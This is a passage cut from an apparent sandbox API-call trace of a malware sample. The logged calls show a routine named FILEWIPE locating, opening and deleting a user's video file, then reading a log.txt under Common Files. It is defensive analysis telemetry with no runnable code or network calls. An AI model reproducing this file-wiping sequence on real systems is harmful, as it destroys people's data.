hHeap=0x8a0000) returned 1 [0199.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0199.189] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0199.189] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.190] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0199.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0199.190] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0199.190] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0199.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0199.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0199.190] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0199.190] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.190] CryptReleaseContext (hProv=0x9c0c88, dwFlags=0x0) returned 1 [0199.190] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.190] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0199.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0199.190] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0199.190] FreeLibrary (hLibModule=0x74f20000) returned 1 [0199.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0199.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0199.190] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0199.190] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0199.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0199.190] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.190] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.191] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.192] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0199.192] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0199.192] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0199.192] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0199.192] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.192] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.192] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\AGaY9D6lmIb.mkv", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9978e910, ftCreationTime.dwHighDateTime=0x1d5e17c, ftLastAccessTime.dwLowDateTime=0x7fde61e0, ftLastAccessTime.dwHighDateTime=0x1d5df17, ftLastWriteTime.dwLowDateTime=0x7fde61e0, ftLastWriteTime.dwHighDateTime=0x1d5df17, nFileSizeHigh=0x0, nFileSizeLow=0x17682, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="AGaY9D6lmIb.mkv", cAlternateFileName="AGAY9D~1.MKV")) returned 0x90af58 [0199.193] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0199.193] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0199.193] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0199.193] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0199.193] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0199.193] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.193] CharLowerBuffW (in: lpsz="byte[95874]", cchLength=0xb | out: lpsz="byte[95874]") returned 0xb [0199.193] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.193] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0199.193] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0199.193] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0199.193] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.193] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0199.193] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0199.194] FreeLibrary (hLibModule=0x75c90000) returned 1 [0199.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0199.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0199.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0199.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0199.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0199.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0199.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0199.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0199.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0199.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0199.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0199.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0199.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0199.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0199.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0199.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0199.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0199.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0199.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0199.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0199.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0199.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0199.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0199.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0199.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0199.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0199.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0199.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0199.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0199.195] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.195] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.195] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.195] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0199.195] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.195] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.195] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.195] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.195] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.195] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.195] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.195] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.195] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.195] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.195] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.195] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.196] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.196] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.196] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.196] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.196] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0199.196] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0199.196] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\AGaY9D6lmIb.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z58zbpazzgtth\\agay9d6lmib.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0199.196] FreeLibrary (hLibModule=0x75990000) returned 1 [0199.196] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.196] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.196] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.196] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0199.196] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.196] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.196] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0199.197] FreeLibrary (hLibModule=0x75990000) returned 1 [0199.197] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.197] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.197] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.197] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.197] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0199.197] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.197] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.197] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0199.198] FreeLibrary (hLibModule=0x75990000) returned 1 [0199.198] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.198] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.198] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.198] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\AGaY9D6lmIb.mkv", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\AGaY9D6lmIb.mkv", lpFilePart=0x0) returned 0x42 [0199.198] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\AGaY9D6lmIb.mkv", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9978e910, ftCreationTime.dwHighDateTime=0x1d5e17c, ftLastAccessTime.dwLowDateTime=0x7fde61e0, ftLastAccessTime.dwHighDateTime=0x1d5df17, ftLastWriteTime.dwLowDateTime=0x1b9f17e0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x17682, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="AGaY9D6lmIb.mkv", cAlternateFileName="AGAY9D~1.MKV")) returned 0x90af58 [0199.198] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\AGaY9D6lmIb.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z58zbpazzgtth\\agay9d6lmib.mkv")) returned 1 [0199.201] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9978e910, ftCreationTime.dwHighDateTime=0x1d5e17c, ftLastAccessTime.dwLowDateTime=0x7fde61e0, ftLastAccessTime.dwHighDateTime=0x1d5df17, ftLastWriteTime.dwLowDateTime=0x1b9f17e0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x17682, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="AGaY9D6lmIb.mkv", cAlternateFileName="AGAY9D~1.MKV")) returned 0 [0199.201] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0199.204] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.204] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0199.204] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0199.204] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0199.204] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0199.204] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0199.204] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0199.204] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0199.204] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0199.204] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0199.204] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0199.204] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0199.204] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0199.204] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0199.204] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0199.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0199.205] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0199.205] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0199.205] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0199.205] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0199.205] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0199.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0199.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0199.205] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0199.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0199.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0199.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0199.205] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0199.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0199.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0199.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0199.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0199.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0199.206] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0199.206] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0199.206] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0199.206] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0199.206] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.206] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0199.206] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.206] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0199.206] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0199.206] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0199.207] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0199.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0199.207] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0199.207] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x3e35, lpOverlapped=0x0) returned 1 [0199.207] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0199.207] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x3e35, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.207] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, 